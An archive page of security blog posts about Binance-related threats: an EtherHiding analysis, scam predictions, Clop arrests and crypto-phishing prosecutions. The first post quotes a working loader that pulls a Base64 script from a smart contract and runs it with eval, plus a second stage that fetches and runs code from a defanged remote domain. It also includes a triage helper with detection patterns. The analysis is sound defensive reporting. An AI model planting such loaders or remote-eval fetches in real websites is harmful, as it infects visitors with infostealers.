Binance Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Tue, 25 Jun 2024 10:25:24 +0000

Binance Smart Contracts Blockchain Abused in Malware Spreading
https://gridinsoft.com/blogs/binance-smart-contracts-abused-malware-spreading/
Tue, 25 Jun 2024 10:25:24 +0000

The post Binance Smart Contracts Blockchain Abused in Malware Spreading appeared first on Gridinsoft Blog.
Cybercriminals appear to be using Binance smart contracts as an intermediary C2, preferring them over more classic hosting because they are practically impossible to take down. The scheme is currently used to deploy infostealers, but it could serve to deliver pretty much any malware.

Cybercriminals Use BSCs As C2 Infrastructure

A new technique, coined EtherHiding, was described over half a year ago, in October 2023. Analysts noticed a shift in the networking patterns of a now-old scheme that tricks users into installing malware disguised as browser updates. Instead of pulling the malicious code from Cloudflare Workers, the compromised sites now direct their requests to smart contracts on Binance.

Smart contracts, in essence, are pieces of code that execute when certain conditions are met, in this case when a correctly formed request is sent. This makes them similar to Cloudflare Workers, which effectively let fraudsters use genuine Cloudflare servers to host malicious code delivery. The difference is that smart contracts live on a blockchain, which makes them nearly impossible to take down. That is probably why cybercriminals started paying them so much attention, aside from the fact that these contracts are dirt cheap. But more on that later.

How Malware Spreads via Binance Smart Contracts

The attack chain begins with compromising a website; hackers usually target WordPress sites because of the numerous vulnerabilities in WP itself and in popular plugins. After compromising the website, they plant a script that talks to a public Binance Smart Chain node over its JSON-RPC API.

// Loader planted on the compromised site (quoted from the article; ABI entries are elided as in the original).
async function load() {
    // Public BSC JSON-RPC node: reading a contract needs no wallet, key or fee.
    let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
        signer = provider.getSigner(),
        // Attacker-controlled contract that stores the next-stage script.
        address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
        ABI = [
            { inputs: [{ internalType: "string", .......},   // entry taking a string: presumably the update function the article mentions
            { inputs: [], name: "get", ......},               // get(): returns the stored payload
            { inputs: [], name: "link", ....... },
        ],
        contract = new ethers.Contract(address, ABI, provider),
        // Read-only eth_call to get(): the reply is the Base64-encoded script.
        link = await contract.get();
    // Decode the reply and execute it in the visitor's browser.
    eval(atob(link));
}
window.onload = load;

As part of the setup, attackers create a new smart contract and store the malicious code in it through the contract’s update function. This leaves the entire scheme locked in a “ready-to-fire” position.

BSC malware delivery scheme

When a user opens the compromised site, the script fires and calls get() on the associated smart contract. The response is a Base64-encoded script string; the loader decodes it with atob() and hands it to eval(), so the user’s browser executes it. This is what defaces the website and makes the “update browser” banner appear.

Experienced users may sense something fishy, as browsers never ask for an update in such a manner, but most people will take it at face value. Clicking the “Update …” button on that banner executes the script grabbed from the smart contract and downloads the final payload. Cybercriminals typically use a set of short-lived throwaway websites to serve the payload. At the moment, Lumma Stealer, Redline and Vidar are the malware families that use this scheme the most.

// Second-stage script fetched after the "Update" click (quoted from the article; domain defanged).
const get_k_script = () => {
    let e = new XMLHttpRequest();
    // Synchronous GET (third argument false) to a throwaway payload site; returns the body as text.
    return e.open("GET", "https://921hapudyqwdvy[.]com/vvmd54/", !1), e.send(null), e.responseText;
};
// The fetched text is executed directly, pulling in the final payload.
eval(get_k_script());
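For triage, an added Python helper (not the article’s or Gridinsoft’s code, nor the attackers’) shows what the loader above does on the wire and how to inspect the stored payload without executing it: it builds the read-only eth_call that contract.get() issues, ABI- and Base64-decodes a reply offline, and flags page source carrying the loader’s markers. The contract address in the usage block is a placeholder and the JSON-RPC reply is a constructed sample.

```python
"""EtherHiding triage helpers: build the read-only eth_call the loader issues,
decode its ABI-encoded reply offline, and flag loader-like inline scripts.
Added example; none of this is Gridinsoft's or the attackers' code."""
import base64
import json
import re

# JSON-RPC endpoint quoted in the article's loader.
BSC_RPC = "https://bsc-dataseed1.binance.org/"
# 4-byte selector = first 4 bytes of keccak256("get()"), a well-known value.
GET_SELECTOR = "0x6d4ce63c"


def build_eth_call(contract_address: str, rpc_id: int = 1) -> dict:
    """Return the JSON-RPC body ethers.js sends for contract.get().
    It is a read-only call: no transaction, no gas, no wallet needed."""
    return {
        "jsonrpc": "2.0",
        "id": rpc_id,
        "method": "eth_call",
        "params": [{"to": contract_address, "data": GET_SELECTOR}, "latest"],
    }


def decode_abi_string(result_hex: str) -> str:
    """Decode a single ABI-encoded `string` return value (offset, length, bytes)."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("result too short for an ABI string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("string offset points outside the payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared string length exceeds payload")
    return raw[start:start + length].decode("utf-8")


def decode_payload(result_hex: str) -> str:
    """What eval(atob(link)) would run: ABI-decode, then Base64-decode, but
    only return the text so an analyst can inspect it instead of executing it."""
    encoded = decode_abi_string(result_hex)
    return base64.b64decode(encoded, validate=True).decode("utf-8", "replace")


def abi_encode_string(text: str) -> str:
    """Inverse of decode_abi_string; used only to construct the sample reply below."""
    data = text.encode("utf-8")
    padded = data + b"\x00" * (-len(data) % 32)
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + head.hex() + padded.hex()


# Constructed sample reply: a harmless script stored the way the article describes.
SAMPLE_SCRIPT = 'console.log("fake update banner");'
SAMPLE_RESULT = abi_encode_string(base64.b64encode(SAMPLE_SCRIPT.encode()).decode())

# Markers of the loader pattern from the article, checked against page source.
LOADER_INDICATORS = {
    "bsc_rpc_endpoint": re.compile(r"bsc-dataseed\d*\.binance\.org", re.I),
    "ethers_contract": re.compile(r"ethers\.Contract\(", re.I),
    "eval_of_base64": re.compile(r"eval\(\s*atob\(", re.I),
    "contract_get_call": re.compile(r"contract\.get\(\)", re.I),
}


def scan_page_source(html: str) -> list:
    """Return the names of loader markers present in a page's inline scripts."""
    return [name for name, rx in LOADER_INDICATORS.items() if rx.search(html)]


if __name__ == "__main__":
    # Placeholder address; replace with the contract seen in a real loader.
    print(json.dumps(build_eth_call("0x" + "00" * 20), indent=2))
    print(decode_payload(SAMPLE_RESULT))
```

POSTing the printed body to BSC_RPC with curl and feeding the "result" field to decode_payload() lets an analyst read the stored script without ever running it.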

Is this new practice dangerous?

It is hard to quantify the danger of this trick, but it has several major advantages over all other methods adversaries have used in the past.

The most noticeable is that, as I said, Binance Smart Contracts are nearly impossible to take down. Cybercriminals are ready to pay hefty sums to run their infrastructure on “bulletproof hosting”, the common name for hosters with little to no downtime that do not cooperate with law enforcement. There are a few other criteria, and BSCs fulfill them all at once. Being based on the blockchain of a huge crypto exchange, they are barely susceptible to DDoS attacks. And they are anonymous: operating smart contracts does not require any personal data, and the contracts do not store any info about their creator.

One more benefit, one that beats even “classic” bulletproof hosting, is the price. Binance charges fees for creating, modifying and interacting with a contract, but threat actors designed their operation to minimize payments. All they pay is the creation fee and then a fee for each update, and that sum is so small ($0.2 – $0.6) that the attackers can modify things almost daily.

Overall, this new modus operandi may dramatically change how malware is spread today. A series of recent operation disruptions made it clear that the previous model does not have a promising future, to say the least. With the abuse of smart contracts, regardless of the blockchain they are based on, malware spreading may take a sharp turn upward.

Protecting Against Malicious Binance Smart Contracts

Although the scheme with malicious Binance contracts looks quite hard to disrupt, the overall attack consists of numerous steps, and that is where proper anti-malware software can intercept and stop the malware. GridinSoft Anti-Malware grants you exceptional protection against both network threats and deeply disguised malware on the disk.

Binance US Ban Scams Incoming: What to Expect?
https://gridinsoft.com/blogs/binance-us-ban-scams/
Thu, 30 Mar 2023 09:52:22 +0000
Recent events around Binance, one of the world’s largest cryptocurrency exchanges, sound threatening. The CFTC, the U.S. regulator of commodity futures trading, charged the company with violating numerous acts and regulations. The platform is used by a huge number of people, and any service outages or withdrawal problems resulting from this lawsuit may create mass panic. In fact, the community is already buzzing like a kicked beehive. Hackers never disdain using such moments, so we can expect a wave of scam approaches that have a single target: money.

What happened to Binance?

On March 27, 2023, Binance was charged by the Commodity Futures Trading Commission with consistently violating its regulations on preventing money laundering and terrorism financing. As the note released by the CFTC says, Binance employees were guided by the company’s CEO, Changpeng Zhao, to ignore the rules set by the CFTC. Those rules require establishing the real identity of a customer in order to prevent deception and subsequent laundering. That thesis is partially confirmed by the fact that throughout the entire 2022, no suspicious activity reports were filed.

“Defendants’ alleged willful evasion of U.S. law is at the core of the Commission’s complaint against Binance. The defendants’ own emails and chats reflect that Binance’s compliance efforts have been a sham and Binance deliberately chose – over and over – to place profits over following the law”, – Gretchen Lowe, CFTC’s Enforcement Division Principal Deputy Director

Currently, Binance is in the middle of a huge scandal, which, however, has done nothing to disrupt its operations. Still, the trial is ongoing, and the situation may change in the future. If the evidence held by the accusing party is proven true, the platform may face serious consequences.

BNB graph
News regarding the CFTC caused serious volatility in BNB (the native Binance token).

First and foremost, regulators can ban Binance from the U.S., cutting off a significant portion of its money flow. Such a ban will likely forbid banks from wiring transactions to the organisation. It will be painful but not impossible to withstand – the US share is not that big. However, if things get worse, US authorities may ask European banks to do the same. Cutting off over 50% of the user base in a single move is deadly for pretty much any company.

What to expect?

The scale of possible scams may easily surpass the similar outbreak that followed the SVB bankruptcy in early March. Hackers were sending emails pretending to be bank representatives or legal agents, offering help with saving money held in the defunct bank. This time, however, the vast majority of targets are regular folks, who are much less aware of scams. Moreover, people are much more likely to interact with emails they receive – and cybercriminals know that.

There is, however, a difference between the SVB case and Binance. Bankruptcy means a complete suspension of all operations – in simple words, you cannot get your money back. A ban in a certain country makes that troublesome, but not impossible. Still, this may be less obvious to people who are not well acquainted with all the procedures. Moreover, most folks have no “plan B” for such a situation. That is what crooks will lean on.

Malicious alternatives

Nature abhors a vacuum. If Binance is gone, there are a number of other platforms offering hot wallets and easy investments. But aside from well-known names, new ones will pop up, offering unbelievably good terms. And for sure, it is better to remain skeptical.

The classic scheme here is offering a service to people who fled Binance, taking their money and running off. These “alternatives” will likely be advertised all over the Internet, as well as on forums. Alternatively, crooks can run classic email spam campaigns, targeting addresses from databases related to a breach that happened back in 2019.

Binance scam example
Example of a Binance scam email (illustrative)

Typically, users will be offered bonuses on deposit, tiny commissions per transaction, or even leverage for trading. Links, wherever they are placed, will lead to a freshly created website with little to no information about the service. Instead, the site will bombard you with offers to create an account and top it up as soon as possible. Once done, you will never see your money again. This fraud may also harvest the personal information you share during registration.

Wire-out help offers

This type of scam may be combined with the previous one, but requires contacting the victim. Crooks reach the victim via email, offering a seamless migration to their platform. The message can also contain convincing statements about a partnership with Binance regarding its customers. Hackers may even impersonate a well-known exchange to lull the victim’s vigilance. However, the link they provide to proceed leads to the same poorly made website.

Cryptoexchange scam
A typical example of a scam cryptoexchange website. This exact page had its URL changed 3 times.

At this point, things get more interesting. Instead of just taking your money, fraudsters can also ask for the addresses of your Binance hot wallet and cold wallet. This, in turn, exposes your identity even more – and may threaten the safety of your funds.

Pseudo-Binance mailings

What is the most classic example of an email scam? Messages that pretend to come from a genuine company. Scams related to the SVB bankruptcy were generally of this sort, and now the story may repeat itself. Hackers will pretend to be the company offering to help with withdrawals or other operations. Alternatively, if nothing bad happens to Binance, the legend may switch to “insure your account” stuff. This scam may take place on social media as well.

Fake Binance support
Fake support message with a phishing link (illustrative)

As usual, you are asked to log into your account by following the link in the message. But oops – this link leads to a phishing copy of the Binance login page. This ends with losing access to your account, which is suboptimal even in times of trouble.

What can I do?

First of all, this is just an attempt to predict upcoming cases. If nothing happens – great; pessimistic predictions are always good when they do not come true. However, the threat of malware and phishing scams in email is as real as ever. Following basic cybersecurity rules is go-to advice for all cases.

Be suspicious of all the emails you receive. Check the sender addresses and read the message body carefully – they can contain signs that uncover the attempt to scam you. Hackers do their best to mimic the original messaging style of companies, but cannot replicate every detail. Why do they call me “Dear user” instead of by my name? And why does the sender’s email resemble a single-use address registered on a quick mailbox service? Notice details this small – and any attempt to scam you will come to naught.

Watch social media messages. Using accounts that mimic the company’s, crooks can reach people with seemingly relevant messages. We are used to sharing a lot of information about ourselves on social networks, so it is not hard to find out whether you are using Binance or not. On Twitter, after the recent changes in its administration, it became even easier to counterfeit official accounts. Acting as support managers, they can easily deceive a huge number of people.

Do not trust links on the Internet. Wherever you find them – in emails or in someone’s forum post – they should not be trusted. They may look legitimate, but don’t be hasty in typing your credentials or other sensitive data. First, check the URL: if it contradicts the contents (e.g. 1281300913.weebly.com showing a PayPal login page), close it immediately. Crooks are extremely good at copying login pages and setting up phishing traps for unsuspecting users.

Clop ransomware continues to work even after a series of arrests
https://gridinsoft.com/blogs/clop-ransomware-continues-to-work/
Fri, 25 Jun 2021 16:05:40 +0000
The media reported that Clop ransomware continues to work: its operators have again begun posting data stolen from victims on their website.

The fact is that last week, as a result of a joint operation carried out with the assistance and coordination of Interpol by the law enforcement agencies of Ukraine, South Korea and the United States, six suspects somehow connected with Clop were detained, but obviously this did not affect the “work” of the group.

Ukrainian police reported that they conducted 21 searches in the capital and in the Kiev region, in the homes and cars of the defendants. Seized were computer equipment, cars (Tesla, Mercedes and Lexus) and about 5,000,000 hryvnias ($182,900) in cash, which, according to the authorities, had been received from victims as ransoms. The suspects’ property was seized.

At the same time, according to the information security company Intel 471, the Ukrainian authorities arrested people who were only involved in money laundering for Clop operators, while the main members of the hack group are most likely hiding in Russia.

“The raids of law enforcement agencies in Ukraine, connected with the CLOP ransomware program, are connected only with the withdrawal/laundering of money for the CLOP “business”. We do not believe that any of the main participants in CLOP have been detained, and we believe that they probably live in Russia. We expect that the impact [of this operation on] CLOP will be negligible, although law enforcement scrutiny could lead [hackers] to ditch the CLOP brand, as we recently saw with other ransomware groups such as DarkSide and Babuk”, the experts said.

Although Clop’s “work” was suspended for about a week after the arrests, Bleeping Computer now reports that the ransomware group has reactivated and published data on two new victims on its darknet website.

The researchers did not disclose the names of the affected companies, but report that personal details of employees were released, including documents confirming employment (for loan applications), as well as documents on wage withholding.

It should also be said that today the Binance cryptocurrency exchange announced that it had taken part in a recent law enforcement operation and helped identify criminals.

Exchange representatives said that they tracked the FANCYCAT group, which is engaged in various criminal activities, including running a “high-risk” cryptocurrency exchange. This group laundered money for ransomware such as Clop and Petya and is generally responsible for more than $500,000,000 in ransomware-related damages, as well as laundering millions of dollars associated with other types of cybercrime.

Clop continues to work

Binance claims to have discovered FANCYCAT together with the blockchain analyst firms TRM Labs and Crystal (BitFury), and then provided all the information it gathered to law enforcement, leading to the group’s arrest earlier this month.

Let me remind you that I also wrote that France is looking for LockerGoga ransomware developers in Ukraine.

US Department of Justice accused two Russians of stealing $17,000,000 worth of cryptocurrency
https://gridinsoft.com/blogs/us-department-of-justice-accused-two-russians-of-stealing-17000000-worth-of-cryptocurrency/
Thu, 17 Sep 2020 16:59:09 +0000
The US Department of Justice brought charges in absentia against two Russian citizens: Daniil Potekhin (aka cronuswar) and Dmitry Karasavidi. It accused them of organizing a large-scale phishing operation against users of three cryptocurrency exchanges: Poloniex, Binance and Gemini.

The two suspects are accused of creating clone sites for the listed cryptocurrency exchanges, where they lured users and collected logins and passwords from their accounts. The stolen credentials were then used to access victims’ accounts and steal their crypto assets in Bitcoin (BTC) and Ethereum (ETH).

This phishing campaign began around June 2017, according to authorities.

“In total, the attackers defrauded 313 Poloniex users, 142 Binance users and 42 Gemini users by stealing $16,876,000 worth of cryptocurrencies”, – say the court documents.

According to the published indictment, Potekhin and Karasavidi withdrew the funds stolen from users to intermediate accounts on various exchanges (including Poloniex, Binance, Gemini and Bittrex), created using fake documents.

In turn, the US Treasury Department reported that, despite all the hackers’ efforts to launder the stolen funds across various exchanges, accounts and blockchains, experts from the US Secret Service were able to track and seize the money. As a result, Treasury representatives wrote that they had imposed sanctions on both suspects.

In addition, the Department of Justice reports that the suspects were not only involved in stealing cryptocurrencies, but also manipulated the market using cheap altcoins.

“The defendants first created several bogus accounts on the same [exchange] platform, and each of those accounts acquired a low-cost digital currency known before the manipulation as GAS”, — Justice officials said, referring to the incident that began in July 2017.

Then, on October 29, 2017, according to the prosecution, the defendants took control of the accounts of three affected customers and used the digital currency held in those accounts, valued at more than $5,000,000 at the time, to simultaneously purchase GAS, which sharply increased demand and price. The defendants and their accomplices then quickly converted the digital currency in their fictitious accounts from GAS to Bitcoin and other digital currencies, causing the value of GAS to plummet.

Prosecutor David Anderson said that in total the two Russians face up to 59 years in prison. However, neither suspect has been arrested so far; presumably, they are hiding in Russia.

Let me remind you that recently the Ukrainian cyber police in cooperation with Binance detained operators of 20 cryptocurrency exchangers.

Ukrainian cyber police in cooperation with Binance detained operators of 20 cryptocurrency exchangers
https://gridinsoft.com/blogs/ukrainian-cyber-police-in-cooperation-with-binance-detained-operators-of-20-cryptocurrency-exchangers/
Thu, 20 Aug 2020 09:59:29 +0000
Since January 2020, the Ukrainian cyber police have been cooperating with one of the world’s largest cryptocurrency exchanges, Binance. The fact is that exchange experts often detect transactions that are potentially related to financial crimes and fraud, and in order to find and punish those responsible, they need the help of law enforcement agencies.

For this, Binance leadership created the Bulletproof Exchanger project, which should help identify malicious activity in the cryptocurrency ecosystem and track down the attackers behind it. Within the project, the exchange cooperates with TRM Labs specialists.

“Since a large number of operations are conducted on the cryptocurrency market with money earned in hacker attacks on international companies, the spread of malware, and the theft of money from bank accounts of foreign companies and citizens, the cooperation of the Ukrainian cyber police department with the Binance company and its help may assist in the detainment of persons involved in such crimes”, – said the head of the Ukrainian cyber police, Oleksandr Grinchak.

The Bulletproof Exchanger project has already demonstrated its effectiveness. This week, the cyber police of Ukraine, together with the General Investigation Department and Binance specialists, announced the exposure and arrest of a criminal group, three members of which operated 20 darknet exchangers and provided services for legalizing and cashing out illegally obtained money.

During 2018-2019, these people made financial transactions worth 42 million dollars. In particular, they laundered money obtained through hacker attacks on international companies and the spread of malware, as well as funds stolen from bank accounts of foreign companies and citizens.

Law enforcers conducted searches, seizing computer equipment, weapons, ammunition and money worth more than $200,000. It is reported that during a preliminary examination of the seized equipment, the police found digital evidence of the detainees’ criminal activities.

Ukrainian Cyber Police and Binance

Currently, the pre-trial investigation continues within the framework of the initiated criminal proceedings. Three defendants face up to eight years in prison for their crimes.

Let me remind you that I also wrote that representatives of the French cyber police believe that LockerGoga ransomware developers are hiding in Ukraine.
